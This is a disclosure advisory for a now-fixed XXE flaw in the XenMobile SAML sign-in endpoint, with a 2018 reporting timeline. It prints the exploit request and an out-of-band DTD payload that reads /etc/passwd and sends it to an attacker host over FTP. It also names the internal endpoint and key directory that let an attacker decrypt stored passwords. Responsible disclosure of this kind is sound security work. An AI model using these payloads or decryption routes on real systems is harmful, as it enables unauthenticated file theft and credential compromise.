It is possible read most of the files and make network calls to private services on the Xen Mobile servers without authenticating.
Current state: Fixed
It is possible read most of the files and make network calls to private sevices on the Xen Mobile servers without authenticating by exploiting a feature of XML External Entity (XXE) processing via the service’s SAML login functionality.
POST /aw/saml/signin/test HTTP/1.1 Host: xenmobile.example.com Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://xenmobile.example.com/index_uc.html X-Requested-With: XMLHttpRequest Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 8748 SAMLRequest=[long string of base64 encoded gzipped data]
The start of the base64 string decodes to
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE saml2p:Response [ <!ENTITY % remote SYSTEM "http://attackerip/attack.xml"> %remote; ]]>
This references a remote file on a server controled by the attacker:
<!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % param1 '<!ENTITY % external SYSTEM "ftp://attackerip/%payload;" >' > %param1; %external;
This causes the server that is processing the XML to read a URL, store the value in a variable and then make an additional request to the attacker’s server with this value included in the URL.
The URLs can be http://, https://, file:// or ftp://. FTP URLs can contain newline characters, so this method allows us read files on the server or make http requests to services inside or outside the firewall and then send the result back to an attacker. Any text file can be read as long as it does not contain a % character.
The server contains configuration files that contain encrypted passwords. There are two ways to decrypt the passwords: either by calling the internal REST API endpoint available at http://localhost:30000/sftu/crypto/dec or by downloading the files in /opt/sas/rt/keys and decrypting the passwords locally.
2018-03-28 – Reported to Citrix and acknowledged immediately
2018-05-21 – Issue reported fixed